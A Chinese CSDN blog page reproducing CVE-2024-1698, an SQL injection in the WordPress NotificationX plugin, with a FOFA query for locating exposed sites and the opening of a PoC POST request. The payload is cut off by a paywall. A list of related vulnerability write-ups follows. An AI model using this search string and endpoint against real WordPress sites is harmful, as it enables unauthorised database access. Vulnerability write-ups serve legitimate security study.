WordPress Plugin NotificationX插件 SQL注入漏洞复现（CVE-2024-1698）

0xSecl

已于 2024-03-20 16:04:33 修改

阅读量814

点赞数 1

分类专栏：漏洞复现文章标签： sql web安全安全

于 2024-03-20 16:03:56 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/136879526

版权

漏洞复现专栏收录该内容

949 篇文章 1558 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了WordPress插件NotificationX在2.8.2版本及其以前存在的SQL注入漏洞，分析了漏洞产生的原因，提供了复现环境和PoC，并给出了修复建议，包括限制接口访问权限和升级到安全版本。

摘要由CSDN通过智能技术生成

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。

0x02 漏洞概述

WordPress plugin NotificationX是一个应用插件。2.8.2版本及之前存在安全漏洞，该漏洞源于对用户提供的参数转义不充分以及对现有 SQL 查询缺乏充分的准备，很容易通过“type”参数受到 SQL 注入攻击。

0x03 复现环境

FOFA：body="/wp-content/plugins/notificationx"

0x04 漏洞复现

PoC

POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/json

{"nx_id": &#

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512)

0xSec

05-05

799

WordPress Plugin MasterStudy LMS 3.2.5 版本及之前版本存在安全漏洞，该漏洞源于对用户提供的参数转义不足，导致可以通过 /lms/stm-lms/order/items REST 路由的 user 参数进行基于联合的 SQL 注入。

【漏洞复现】WordPress Plugin NotificationX 存在sql注入CVE-2024-1698

失心少年

03-22

776

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。WordPress和WordPress plugin都是WordPress基金会的产品。WordPress Plugin NotificationX 存在安全漏洞，该漏洞源于对用户提供的参数转义不充分以及对现有 SQL 查询缺乏充分的准备，很容易通过“type”参数受到 SQL 注入攻击。

参与评论您还未登录，请先登录后发表或查看评论

CVE-2021-39348 WordPress LearnPress插件XSS漏洞复现

灵墟精_lxj的博客

12-16

3467

WordPress的LearnPress插件（LearnPress < 4.1.3.2版本）中存在一个xss漏洞。本文将从搭建wordpress开始，复现CVE-2021-39348这个漏洞。

WordPress插件File-Manager任意文件上传漏洞复现

玄道的网安博客

10-12

4372

简介 WordPress插件WPFileManager中存在一个严重的0day安全漏洞，攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程执行代码。影响版本 File Manager 6.0-6.8 环境搭建 Wordpress下载地址 https://cn.wordpress.org/wordpress-5.4.1-zh_CN.tar.gz 插件下载地址 http://plugins.svn.wordpress.org/wp-file-ma...

八个有用的WordPress的SQL语句

殷高兴的专栏

03-20

532

在过去的十年中，MySQL已经成为广受欢迎的数据库，而WordPress博客使用的是MySQL数据库，虽然使用插件可以解决一些问题，但是实现某些特殊任务的时候，在phpMyAdmin中执行SQL语句是最简洁的方法，这里就总结八个有用的WordPress系统的SQL语句，用于解决一些实际碰到的问题。　　1、创建备份数据库　　备份数据库是首先要做的事情，只需要通过以下方法就可以简单备份数据库：

notification源码分析_Linux内核CVE-2017-11176漏洞分析与复现

weixin_42105816的博客

12-18

270

一、漏洞背景Linux内核中的POSIX 消息队列实现中存在一个UAF漏洞CVE-2017-11176。攻击者可以利用该漏洞导致拒绝服务或执行任意代码。本文将从漏洞成因、补丁分析以及漏洞复现等多个角度对该漏洞进行详细分析。二、漏洞分析Posix消息队列允许异步事件通知，当往一个空队列放置一个消息时，Posix消息队列允许产生一个信号或启动一个线程。这种异步事件通知调用mq_notify函数实现，m...

WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)

0xSec

05-01

1304

WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞，该漏洞源于插件的用户身份验证机制，威胁者可以绕过该机制执行恶意SQL查询，将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件，并可能完全控制受影响的网站。

【漏洞复现】WordPress Automatic SQL注入漏洞(CVE-2024-27956)

qq_67810151的博客

05-07

533

WordPress Automatic Plugin 小于 3.92.0 的版本存在SQL注入漏洞，未授权的攻击者可以通过该漏洞获取数据库敏感信息。

php接口中直接执行sql,如何在wordpress中直接执行sql语句

weixin_42503008的博客

03-11

435

任何的系统都离不开数据库，用到数据库存就有sql查询语句，wordpress也不例外；今天我们就来简单的介绍一下在wordpress中直接执行sql查询语句的一些方法;WordPress提供了一个类的操作数据库存的全局变量叫$wpdb，通过这个全局变量来与WordPress数据库进行关联，所以我们在使用之前，需要先定义下这个全局变量，写法如下：query 函数执行数据库查询，可以通过 quer...

WordPress查看 SQL 的方法

weixin_55720383的博客

09-14

431

此外，由于日志包含大量信息，很难确定哪些查询是您的，因此只建议在测试服务器上使用，只在需要解决重要问题时才登录 MySQL 服务器查看它。它虽然可用，但并不是理想的选择，有点像那种不可靠的人，总是在平时出现，但在关键时刻消失不见。此外，由于记录了所有 SQL 查询，导致查询量巨大，很难找到与您相关的查询。经过多年的 WordPress 开发经验，小编为您整理了三种查看 WordPress 执行 SQL 查询的方法，希望其中一种适合您的需求。1 颗星（满分 5 颗星）3 颗星（满分 5 颗星）

实用WordPress后台MySQL操作命令

weixin_33849942的博客

01-06

363

关键字： WordPress MySQL 后台数据库地址：http://www.cnblogs.com/txw1958/archive/2013/01/06/wordpress-sql.html WordPress将其所有信息片段（包括文章、页面、评论、博客链接、插件设置等）存储在MySQL数据库中。虽然WordPress用户可以通过网站后台编辑控制以上信息片段。不过假设你的WordPre...

【漏洞复现】WordPress——Recall——SQL注入（CVE-2024-32709）

LongL_GuYu的博客

07-11

1236

Plechev Andrey WP-Recall存在SQL注入漏洞。该漏洞影响WP-Recall版本从n/a到16.26.5。攻击者可以利用该漏洞在SQL命令中不恰当地中立化特殊元素，造成数据库被恶意操作的风险。

常用的WORDPRESS 的SQL语句

gjpdeyx的专栏

05-11

1027

下面所有的SQL语句都是针对前缀为wp_的表，如果你的表前缀不是wp_，请做相应的修改1.更改wordpress安装和首页地址如果你更换域名或者把wordpress的安装目录进行了变动就需要进行修改，UPDATE wp_options SET option_value = replace(option_value, ‘旧网址’, ‘新网址’) WHERE option_na

WordPress插件SQL注入漏洞——漏洞复现

W小哥

11-25

9199

复现过程环境地址：https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe 访问目标网站常规工具AWVS扫描是扫不出来漏洞的第一步识别CMS vulnx -u http://219.153.49.228:47712/ --cms wpscan --url http://219.153.49.228:47712/ 给API的token才能将结果输出 ...

WordPress Plugin SQL注入漏洞(CVE-2024-25832)

2301_80127209的博客

06-18

655

WordPress是一种流行的内容管理系统（CMS），它提供了基本的网站功能，如文章发布、页面管理和用户权限控制等。然而，有时候用户需要更多的功能或特定的定制需求，这时就可以使用WordPress Plugin来实现。申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等。帮助你在面试中脱颖而出。

漏洞复现-wordpress RCE-CVE-2024-25600

04-12

641

本人从事网路安全工作12年，曾在2个大厂工作过，安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过，对这个行业了解比较全面。最近遍览了各种网络安全类的文章，内容参差不齐，其中不伐有大佬倾力教学，也有各种不良机构浑水摸鱼，在收到几条私信，发现大家对一套完整的系统的网络安全从学习路线到学习资料，甚至是工具有着不小的需求。最后，我将这部分内容融会贯通成了一套282G的网络安全资料包，所有类目条理清晰，知识点层层递进，需要的小伙伴可以点击下方小卡片领取哦！

WordPress plugin 代码注入漏洞(CVE-2022-24663)

千寻的博客

12-09

2491

远程代码执行漏洞，任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 `PHP Everywhere `的请求，并在站点上执行任意 PHP 代码。存在常见用户名低权限用户弱口令

如何搭建WordPress博客网站，并且发布至公网上？

YUAN_XU_CHENG的博客

08-09

124

本教程是《Windows下如何使用cpolar搭建Web站点系列》第4篇，前面已经介绍cpolar的安装，搭建了一个简单的演示站点，并且配置好了开机自启动。如果您没看过之前的教程，请先阅读《第一篇》。本篇继续，搭建一个真正有用的Web站点，您可以用它来撰写博客、搭建您自己的企业站点，外贸站点等，并且发布至公网上。我们创建了一个新Web站点，安装配置了wordpress最新版本，并且配置了公网隧道，二级子域名，并且给新站点配置了主题样式，您拥有了一个属于自己的博客站点，可以写博客，开启自己的自媒体之旅。

wordpress中直接执行sql语句详细教程

unber的博客

07-11

831

任何的系统都离不开数据库，用到数据库存就有sql查询语句，wordpress也不例外；今天我们就来简单的介绍一下在wordpress中直接执行sql查询语句的一些方法; WordPress提供了一个类的操作数据库存的全局变量叫$wpdb，通过这个全局变量来与WordPress数据库进行关联，所以我们在使用之前，需要先定义下这个全局变量，写法如下：global $wpdb;query 函数执行数据库查询，可以通过 query 函数在WordPress数据库中执行任何SQL查询。Select查询只返回查询的

CVE-2024-38809